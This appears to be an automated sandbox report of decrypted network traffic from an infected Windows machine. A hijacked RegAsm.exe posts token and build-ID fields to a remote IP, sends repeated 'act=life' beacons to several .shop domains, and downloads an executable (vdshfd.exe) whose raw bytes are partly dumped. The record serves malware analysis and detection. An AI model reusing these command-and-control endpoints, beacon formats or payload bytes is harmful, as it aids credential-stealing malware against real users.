2024-09-26 18:15:02 UTC	8000	IN	Data Raw: 84 df 03 6a b4 83 3c a2 8d 9f df 03 18 76 b5 b3 73 92 1c 49 a7 e0 f4 74 89 d5 b1 90 26 ab 47 40 4a 37 13 54 81 f2 79 82 ec f5 26 2e e0 a3 d2 a1 b0 43 e0 d0 31 d3 4f e0 56 5d fd 6a f1 51 d9 fd e7 70 e9 28 5d 93 bb 56 ae c4 d7 bf 72 00 73 39 5d 00 76 f2 e9 19 b2 b1 fe d2 c6 01 68 4e 4b d1 99 8c e4 2e 73 01 93 e6 21 e8 97 ef 61 42 97 67 fd 4e c0 fc e0 ea 07 2c 28 60 15 58 b4 a9 fe 6e c1 4c 75 5a 72 75 c4 39 ec 40 61 6b 4a 79 51 43 1c 75 5d d0 dc ae 9d 1c 13 b2 f8 57 10 24 ab 33 5f 36 03 c7 e4 f9 2c 8d 0f d8 37 8f 1f ba fc 92 85 86 a1 83 8a ea 38 9b a3 52 1f db fd 32 c7 57 c9 c3 63 e4 81 2a 0c de e8 d4 bd 53 f1 eb 09 56 a6 0f 51 79 03 13 e3 46 2d 5f 16 a8 0a e1 bc 7d 83 db 29 a1 fa 77 1a 84 fc c7 b8 a8 0b 6b c1 6f 51 13 f0 24 62 6c 31 fe d9 41 d1 de e7 ea 0d Data Ascii: j<vsIt&G@J7Ty&.C1OV]jQp(]Vrs9]vhNK.s!aBgN,(`XnLuZru9@akJyQCu]W$3_6,78R2Wc*SVQyF-_})wkoQ$bl1A
2024-09-26 18:15:02 UTC	8000	IN	Data Raw: 98 88 95 12 39 83 a7 08 39 97 43 6f e4 c5 55 c9 0c ee 6f 08 19 a6 1c 65 c7 6d 29 73 ce 02 ed 72 21 15 cd e2 dd e2 9c 1d 77 5d 0b b5 4b f0 4c 7a 79 8f ea ce ad a1 ca 06 94 58 02 a4 1f 36 e1 2d 98 73 71 6a bd f4 07 63 ab 1f 96 1b 4d c4 13 f4 25 24 4b a9 d2 c7 e6 17 17 72 e5 d5 1e a3 0e d8 83 19 46 08 2f 1d 3e ab fa c2 12 5d 84 dc 7b 6c 09 cc e8 57 0e 5d 17 4a 74 68 8e 99 93 6d b8 36 cf 52 54 3f cc d4 16 f9 31 e2 d5 29 06 30 2f 77 35 36 80 9b 23 e9 8e 72 8b 27 d8 75 f3 17 bd b5 0a 3a f9 eb c2 c7 8b 6f 6b 57 42 6e 6e 23 d5 bc 35 5c 6a 30 23 0b 6a df 2e 64 76 54 35 15 e4 c4 83 89 be af 4b 42 64 49 83 02 e3 7c 8c 42 f2 4e 37 10 71 5b db 0e 89 3a 84 ce 84 c5 3f 0f a9 57 b5 f4 db f3 8a 5f e2 60 5b 39 74 d7 61 e3 ff 4f a5 35 fb 5a b7 82 2d 09 3f 88 93 e8 da 4d 87 Data Ascii: 99CoUoem)sr!w]KLzyX6-sqjcM%$KrF/>]{lW]Jthm6RT?1)0/w56#r'u:okWBnn#5\j0#j.dvT5KBdI\|BN7q[:?W_`[9taO5Z-?M
2024-09-26 18:15:02 UTC	8000	IN	Data Raw: 1a 06 41 2d 9f a0 a9 d8 6d cc d1 be 4a 46 7b 32 c2 98 39 d3 d1 00 02 a7 6b ed 0f 4a c5 cb d5 af 51 d2 6e 1e ba af 46 9b 31 4f ba ca 45 60 a2 08 f9 79 ba 8a 67 19 f6 40 42 68 83 da b4 cd d5 9b 0c ff eb cf d4 ce ad 88 26 a0 bd 98 31 b7 1d 57 b7 25 74 06 d4 3f 08 e6 6f 1c af 38 03 a4 14 59 43 cd 3b 2f 60 d9 80 c8 27 f3 99 b0 02 9f 3c af e0 8b 97 29 92 eb 29 b3 54 52 30 87 e8 ea 13 5f de 19 aa a5 9c 3b d7 82 b6 49 80 67 76 79 66 ad d2 69 d5 0e 8b ed 00 f7 55 6c ce 7d f3 9a 11 5f 38 06 9d 04 e0 aa 7c b5 48 3d 51 05 fc a3 43 a2 2e 98 99 80 07 3a a3 b8 63 df be 39 64 7e 1e 75 32 03 29 16 79 4c 1b ef 3d eb a1 c7 1f da e7 02 0f f5 71 c9 93 2d 52 50 b1 00 bd 83 25 c3 75 72 8b 38 be 60 ed 71 c8 99 1f 35 00 df 27 b1 b0 d2 ee dc aa e8 16 20 3a 40 45 8d 59 d3 32 9b b8 Data Ascii: A-mJF{29kJQnF1OE`yg@Bh&1W%t?o8YC;/`'<))TR0_;IgvyfiUl}_8\|H=QC.:c9d~u2)yL=q-RP%ur8`q5' :@EY2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49740	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:04 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDHDGCBFBKECBFHCAF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:15:04 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 35 62 33 34 34 37 64 37 62 63 62 62 63 32 65 38 39 37 66 30 64 32 64 30 32 34 32 39 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 Data Ascii: ------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="token"355b3447d7bcbbc2e897f0d2d0242908------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------EGIDHDGCBFBKECBFHCAFCont
2024-09-26 18:15:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:15:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:15:04 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49741	188.114.96.3	443	6460	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:04 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ghostreedmnu.shop
2024-09-26 18:15:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 18:15:04 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 18:15:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3370jaa90ocgfjjmhe0udtf7f7; expires=Mon, 20 Jan 2025 12:01:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FqIvPbH2T637cm46YJdm7khi6FNHwwkQjWlVmQglWpazGzvHUJC%2Fki1W8xHh%2F1Vm7q%2BF0ZT%2FFS0LRLYy4wDOHND9md0OydsosRa4kjbibXdKPZvkekcxortj3t6dM3LwzZz1yA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c953cbbdbf14238-EWR
2024-09-26 18:15:04 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 18:15:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49742	172.67.132.32	443	6460	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:05 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gutterydhowi.shop
2024-09-26 18:15:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 18:15:05 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 18:15:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3h19udhl05hikti74n3eqsl4i3; expires=Mon, 20 Jan 2025 12:01:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zBfzyeNARnqOBdmtQ7KbT%2BUXpQvXQwuvjQ52NCsSds31e9QRONduH5rHNsuwAgsGpWIFQbSO0c0iv14vPWTnIQjrP%2FXLNgvxQWVYnrpoH4xaYc%2B%2BrmaZJDUt84y7EgZcVjHDcg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c953cc1eae00dc7-EWR
2024-09-26 18:15:05 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 18:15:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49743	172.105.54.160	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:05 UTC	170	OUT	GET /vdshfd.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: dbsmena.com Cache-Control: no-cache
2024-09-26 18:15:06 UTC	284	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 18:15:06 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 26 Sep 2024 16:59:47 GMT ETag: "c09a7-64e28-62308aa791e92" Accept-Ranges: bytes Content-Length: 413224 Content-Type: application/x-msdownload
2024-09-26 18:15:06 UTC	7908	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c2 91 f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf>< @@ `
2024-09-26 18:15:06 UTC	8000	IN	Data Raw: 46 c1 72 f0 d6 ed 0f 18 93 33 5b 7d 4c d0 50 d8 7f 55 dd d7 45 78 ae 0e 99 f8 ab c9 47 3f 35 24 d7 46 3f 6a f5 e3 6b 58 01 ee 4b 9d c2 64 b9 1e 27 71 2a 57 01 c3 16 b0 0e cb b4 25 a1 49 2d 7c 56 2f 0d 92 0c a3 d4 03 91 59 07 3c 5e 13 03 41 c0 63 02 88 34 e9 48 b1 9b d0 16 c7 2f bd 25 30 cd a9 10 e0 80 a2 50 f7 eb 9f 6e 1d cd 10 a5 fb 19 65 9d 36 2e 59 cb 73 38 db 58 51 12 bd 86 bc c9 2b 2f d9 3a 24 5a 54 68 6e 8c c1 52 72 eb 4e 74 d4 0c fa 9a 8e dc d8 b6 a9 6c 49 87 c6 22 b3 2b 25 76 b5 df 28 59 05 79 55 f7 c4 aa 95 33 47 59 9f 50 a5 7d 0e b3 9b 1b 09 7c 72 cd 03 98 a4 fd c0 5c eb 33 d7 d1 41 ed 15 f2 e8 3d c3 e9 bf 2c f5 bb b3 8b a8 51 a0 58 d5 54 eb c4 b5 54 5c 82 5c e7 d3 99 0f fd f5 d0 36 79 bd 69 a0 39 89 17 7d d7 ca f0 c6 0a c1 be 29 38 2c 83 74 f1 Data Ascii: Fr3[}LPUExG?5$F?jkXKd'q*W%I-\|V/Y<^Ac4H/%0Pne6.Ys8XQ+/:$ZThnRrNtlI"+%v(YyU3GYP}\|r\3A=,QXTT\\6yi9})8,t
2024-09-26 18:15:06 UTC	8000	IN	Data Raw: 8e ca 55 d4 6c 46 17 ec 28 f9 d4 58 7a 79 30 10 b3 ad 92 46 c8 9f 1a cf 5a e9 9c dc 1b cb 4c be d7 ec 2f 57 82 fc d3 d0 e2 36 65 9c c3 29 4e 82 97 1e 87 e7 c2 72 e4 ad be 81 2a bd ce ae b4 84 4d 00 fa 49 cc 0b 2b 4e 54 46 cc fb fb f0 9a 00 01 3f c1 69 67 7e 40 0f 19 68 9e 8a 0f 1e 39 a3 e4 0b 1e 32 7e dc ab 11 40 92 0f 12 40 4c d1 bf 04 a2 50 86 d1 dc 96 96 ea c5 ab 19 dd ce 4d 06 16 d9 13 c6 1c 8c 2b 21 ec a0 fd 89 00 48 aa 68 52 fa c0 dc 9e a0 50 a0 dd 34 20 d6 f8 dc 3d e2 c7 df 5b 37 94 8f b0 c3 23 2f 1d 03 94 67 98 37 df ae 1c 34 31 bc 43 15 60 b9 7b c9 c7 76 7d 7e 9c 1b 9d 0c 20 dd e1 d1 7e 39 e0 a8 77 10 77 37 ed f2 16 52 9b 09 89 2c a6 45 6e 49 ed 96 a4 cc 10 eb e4 3d 7a 7d 0c df 60 d6 fa 50 8c 22 87 fc cd f0 9f 0b c8 ca 83 38 d3 1a 2d a6 a6 d1 6a Data Ascii: UlF(Xzy0FZL/W6e)Nr*MI+NTF?ig~@h92~@@LPM+!HhRP4 =[7#/g741C`{v}~ ~9ww7R,EnI=z}`P"8-j
2024-09-26 18:15:06 UTC	8000	IN	Data Raw: 00 6b 91 b4 75 c8 49 c4 09 a8 d5 50 79 64 f1 1a 98 ef e5 6a a0 dd a8 69 b8 58 a3 30 04 97 42 88 52 b2 11 03 a0 f7 4f f5 54 e7 f6 bd 2f b4 80 79 a4 0d 51 4f 71 d3 0d d9 2a 55 2e ec 98 1e 7a cf 7e d9 44 64 6a ec 09 5a 68 d6 f3 67 c5 59 9d 03 4b df cc 0b 02 93 9a b9 72 b9 71 78 fa c9 a0 5f f9 39 a1 7e 1c 78 96 a5 31 41 41 08 15 f1 bc 5d 07 3c 49 01 ab 9e 01 8e b9 27 f6 1b 17 2f 21 eb aa e5 2b f3 ce 59 75 e2 1b b8 ab 17 d6 81 69 c1 41 cf 56 0e 75 05 b0 ae 3a 95 ed 54 75 1b 2d 11 7f 25 c2 47 1c 83 2f 81 32 1b 73 12 c6 2a 0c 0f f8 c6 23 4b 9d f3 64 18 71 25 c4 bd 6f f5 c7 cb fa 88 9a 98 12 5a b0 df 0f 12 37 20 74 06 9d 4f f2 25 0b 47 a6 70 b9 e3 21 fd ef 43 0a 8f 47 68 ee 36 01 e5 bb 83 f3 23 07 d7 a6 0b 6a 63 b7 a6 83 88 da e5 d0 95 cc 29 e0 07 23 8e 35 7a 74 Data Ascii: kuIPydjiX0BROT/yQOqU.z~DdjZhgYKrqx_9~x1AA]<I'/!+YuiAVu:Tu-%G/2s#Kdq%oZ7 tO%Gp!CGh6#jc)#5zt
2024-09-26 18:15:06 UTC	8000	IN	Data Raw: 8a b4 be 40 a2 e6 0a c1 4e 75 dc 75 e3 bf a9 65 28 ea d2 34 61 c2 d4 f4 33 3e 22 a8 8a 54 28 2c f8 94 28 55 7a c1 f1 1e cb 2c 28 1c fa 61 a7 4d db 59 0b e6 f7 7c 08 c2 f0 70 c3 86 8d 9c 93 76 dc 4e 61 2b 66 6a 2e f9 86 e4 dd bc 00 72 83 b5 77 81 5d 34 cd 97 30 b0 32 dc 82 77 49 c0 9f ae 00 35 bc 48 b1 87 5f 47 32 c4 da ae 15 b2 5a a2 b7 cf 57 f7 77 a8 5d 52 12 d2 04 8a 44 18 64 ee 38 17 0f 58 18 3a a5 b4 ad 3d ee 9a b9 39 35 77 66 75 a3 7d ca e4 7a 2a 08 f3 9a 03 8c 71 63 53 0a e6 16 7c 3d de a0 01 a9 52 3a f9 f3 04 11 3c 00 02 b1 7f b1 6a e4 fb 77 99 b0 22 57 84 21 68 a1 4b d1 c3 16 f1 e4 45 ff 68 1a e8 7c 5d 0c 89 7e 1a b5 25 2e 7e cd 78 b5 c2 4f 92 7e 18 6e 59 0c e5 f3 61 ef 0d 1d 7d 01 72 9c b7 46 0e cf 0e 8c f4 2a 04 3d 10 67 c0 8c b8 b8 a2 bf 21 4f Data Ascii: @Nuue(4a3>"T(,(Uz,(aMY\|pvNa+fj.rw]402wI5H_G2ZWw]RDd8X:=95wfu}zqcS\|=R:<jw"W!hKEh\|]~%.~xO~nYa}rF=g!O
2024-09-26 18:15:06 UTC	8000	IN	Data Raw: 5f ad 55 5b 51 b6 d6 62 08 46 00 cf 4a 07 f1 17 26 96 65 e9 82 cf bb 72 06 3c 4d ee fc 9c 96 b7 a7 6f a8 d6 0f f5 ed 8a d8 9e 8c ac 37 bd 38 a7 a1 7d 9f 3f 24 78 8a 94 82 90 9a f1 fb aa 1a 34 12 32 8c 32 ac ad 6a 78 85 38 5f 3c e0 a9 21 ab 45 19 79 02 78 1e 08 68 a6 f6 f9 03 a3 e7 26 56 ed ca 36 b1 4d a4 92 82 2a 9f 54 8f af ae 07 27 b6 94 90 72 fd a9 a2 1e ca 09 78 7d a9 ec 77 7b 60 a9 e0 ab 7b 80 88 bc 3e ae e4 6e 86 57 67 c4 f7 b7 e9 6f dd 68 99 7d bd 9d 63 18 6b f9 97 e8 96 21 3a 54 69 44 6f c1 46 07 dd f0 4c ae 15 1f b7 4e 7d c6 f6 c5 15 62 9a 65 1b 88 e1 ff 9b 93 5c c0 27 92 55 a1 91 32 01 1e 27 1d 77 9a 48 0b 73 0e 70 21 1a 04 65 7b 59 21 ec bb 3b 76 16 0a 04 4c 1e 1d 8e 4f 00 f3 61 46 25 10 12 81 8e 05 cd 26 a2 58 06 93 e2 d2 95 b9 94 06 29 a4 de Data Ascii: _U[QbFJ&er<Mo78}?$x422jx8_<!Eyxh&V6M*T'rx}w{`{>nWgoh}ck!:TiDoFLN}be\'U2'wHsp!e{Y!;vLOaF%&X)
2024-09-26 18:15:06 UTC	8000	IN	Data Raw: 12 d1 2e 62 96 eb 74 ce 56 66 4f 59 d8 c5 6c 94 a7 de 90 40 25 89 49 a2 f7 3c 6a 3b f2 35 30 a1 9a 12 80 6a a4 87 27 8d 79 47 09 aa 90 d9 89 1b 81 67 75 c4 1e 65 a0 00 38 04 75 28 f4 b7 b7 dd cc 17 3e 03 a9 de 11 ae eb 62 c0 a4 e7 77 50 ee d4 a0 2a 14 89 67 b1 02 2a 5b e2 cf 9c 4f d3 18 fc b9 d1 f8 0e 44 db 7d d2 94 af d5 99 5e 66 8f b0 c8 b2 e1 5f 88 4a 83 6c 6a 20 22 58 ee 60 43 45 97 46 ad e0 82 64 f2 70 f7 a1 9f fb 68 82 c3 cb 27 2b 28 d2 b1 68 d4 d6 97 75 50 a4 b9 f0 d0 5e 7e 1d 19 56 68 c7 f3 bf f4 a9 e5 a3 ce e8 ca 57 69 61 83 56 11 27 cf 80 e1 5e 4c 9a 36 c6 4a 04 e3 0f 63 18 b5 a8 a4 5b 13 a4 ea d5 56 1e 68 84 e4 db ac 92 07 60 f8 47 20 34 da d5 f1 ae d7 05 c5 ab 8c dc 11 f8 9b f8 b5 76 b8 eb 03 63 dd 19 4c 9d 46 e2 61 f6 8e 17 2c 0c 7e 3f 97 4b Data Ascii: .btVfOYl@%I<j;50j'yGgue8u(>bwPg[OD}^f_Jlj "X`CEFdph'+(huP^~VhWiaV'^L6Jc[Vh`G 4vcLFa,~?K
2024-09-26 18:15:06 UTC	8000	IN	Data Raw: a1 00 c3 90 15 dc a8 68 99 43 79 c1 d5 4d 47 15 f3 ef b2 15 c2 1a cc ee 9c 3a 03 6e 5e ae d7 96 48 99 8a 68 97 c5 0f e5 76 e0 54 8f 96 f3 e9 86 df fb ab 55 aa 23 ce ea c2 db 04 26 9a 52 da b7 85 c7 b9 85 24 34 be fe ff 90 8f 64 ca e4 4e ce 9c ab 4c d0 3b 18 c2 90 69 fb 9d 48 41 33 2b 85 03 c4 42 b8 fe dd df 5c 62 cc ec a7 38 ce cb 89 08 62 35 6f c8 4b 97 11 a1 a3 e8 f7 3f 18 6c 08 e3 67 28 78 cf 37 c6 8f 7d eb 11 a3 bf 14 e6 de e6 bf 70 4c cf 90 b2 f8 a2 79 72 91 26 fb 50 bd 10 6c be 74 98 33 24 b6 86 e5 45 2d d2 55 ca 5d 1c d8 fa a3 0b 33 54 a0 8b 72 3f 09 bc 19 7b de 1b 17 f4 0a 80 2e f7 20 b6 8e 28 41 d4 43 2f 61 e8 af e3 cf 08 41 66 21 90 eb f2 9b d7 9c 13 d5 35 95 7b b0 12 4b ae 23 ac 13 42 87 77 8a 9d 94 63 45 2e 4e d8 6a de 3b dc bb 91 c1 fb 5a 20 Data Ascii: hCyMG:n^HhvTU#&R$4dNL;iHA3+B\b8b5oK?lg(x7}pLyr&Plt3$E-U]3Tr?{. (AC/aAf!5{K#BwcE.Nj;Z
2024-09-26 18:15:06 UTC	8000	IN	Data Raw: 99 73 07 ba 05 53 0a 2e 8e ce 74 09 14 aa 3e 5d 9e e9 dd 64 05 b6 14 43 94 83 8f 1f 4d ca 52 ba 85 36 ab af 17 a7 76 75 d8 c3 12 21 29 fd d1 ce 6b 0f ca 78 93 32 72 fa 82 7e 71 e5 24 25 c6 54 c7 ce 9e 61 ad 3c 55 98 fd 12 c0 4d f8 e4 5c eb c8 f6 36 f6 0a 13 51 5d 4d 0c cd 86 11 06 16 3c b5 a3 b0 86 1c 5e f1 e7 e1 0e 2a b3 53 41 4a d2 52 4e 21 b2 7a 93 20 b7 ae f8 c2 00 c0 07 11 b6 b5 8d 98 bb 03 f0 f6 a3 95 63 3c 3c 17 9a 74 2f d0 af cd d0 dd 22 01 64 38 8e ee eb 53 e4 77 9a 0a 0d b2 93 4e 29 62 80 39 ed 62 cc 14 f3 f6 b2 19 21 60 df f0 66 33 30 09 c7 bc 65 fa 96 dd e5 7b 6e 1c 60 b8 3b 70 3e 0e 07 0f b9 bf 8d bc 8f 88 b3 58 b0 71 9e 80 42 0b e8 8a fd 9a 80 db b9 d8 e9 6a d6 91 8f 0a f1 ca bc 70 7e 67 36 86 f5 a8 ac db f3 ab 7a b7 ee 5d fe 8c c4 01 8f 63 Data Ascii: sS.t>]dCMR6vu!)kx2r~q$%Ta<UM\6Q]M<^*SAJRN!z c<<t/"d8SwN)b9b!`f30e{n`;p>XqBjp~g6z]c
2024-09-26 18:15:06 UTC	8000	IN	Data Raw: 82 9c 92 0b 46 c8 04 70 76 13 9b 87 42 0f ae 6d 7a c3 d0 76 5d bc b0 ff 48 db bf 3e fc 06 2e b8 bd d7 2e 37 77 1c bb 33 5d 8d 3b f0 bf 65 5f 83 c1 77 86 3d ad 8a 0a 11 9b 49 1f 6d d3 f9 d2 c3 2e e1 b7 e8 4e ce ea b1 2f 5e a7 70 20 8a e2 df 18 7e 39 b7 b7 5b 71 e4 ca 40 07 3d 72 f9 e4 f7 25 a2 4e 98 96 47 59 4b 96 b3 84 1a 48 c8 8a 10 81 29 1c 91 ff 8f f6 55 73 98 3d 66 fb 39 db 5d 21 7a f3 64 08 3e 22 28 17 0f b7 f9 4c dd 80 02 98 f7 48 a8 94 62 60 f7 32 41 83 1a e4 00 24 f8 90 bf bd 63 e7 47 75 7e 13 f3 58 7a 36 e8 68 24 0e 4a e7 13 e8 23 ce 89 fe 2b 02 1c 26 87 47 80 c4 2e 1f 43 be 6f f8 1f a8 62 49 a0 c9 de 42 6e dd 1a a4 42 7a eb 9f 6e 5b c9 09 12 ed 5b ee 9a c7 45 64 14 51 98 e0 f8 d7 bb de 72 cb da 54 bb a0 ef d7 e0 52 85 2b 84 cb 22 72 85 53 3f 1e Data Ascii: FpvBmzv]H>..7w3];e_w=Im.N/^p ~9[q@=r%NGYKH)Us=f9]!zd>"(LHb`2A$cGu~Xz6h$J#+&G.CobIBnBzn[[EdQrTR+"rS?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49744	188.114.96.3	443	6460	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:06 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ghostreedmnu.shop
2024-09-26 18:15:06 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 18:15:06 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 18:15:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=aqjel69gtgmo0q1kbv9rbdvcr3; expires=Mon, 20 Jan 2025 12:01:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dbGlWJE8uPDE6roW6%2FaiTSrm7aonxw3WytcjOsyvSxuewf013R9ThOukAP6iNi3gdU4Zvv0iQSxGVCrBeWmmUtJ6C2TQL%2BtKPAcj1OBxJzxyqDzBLyiu2GgqpdI%2FU6jk%2BW5Djw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c953cc87af14333-EWR
2024-09-26 18:15:06 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 18:15:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49745	188.114.97.3	443	6460	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:07 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offensivedzvju.shop
2024-09-26 18:15:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
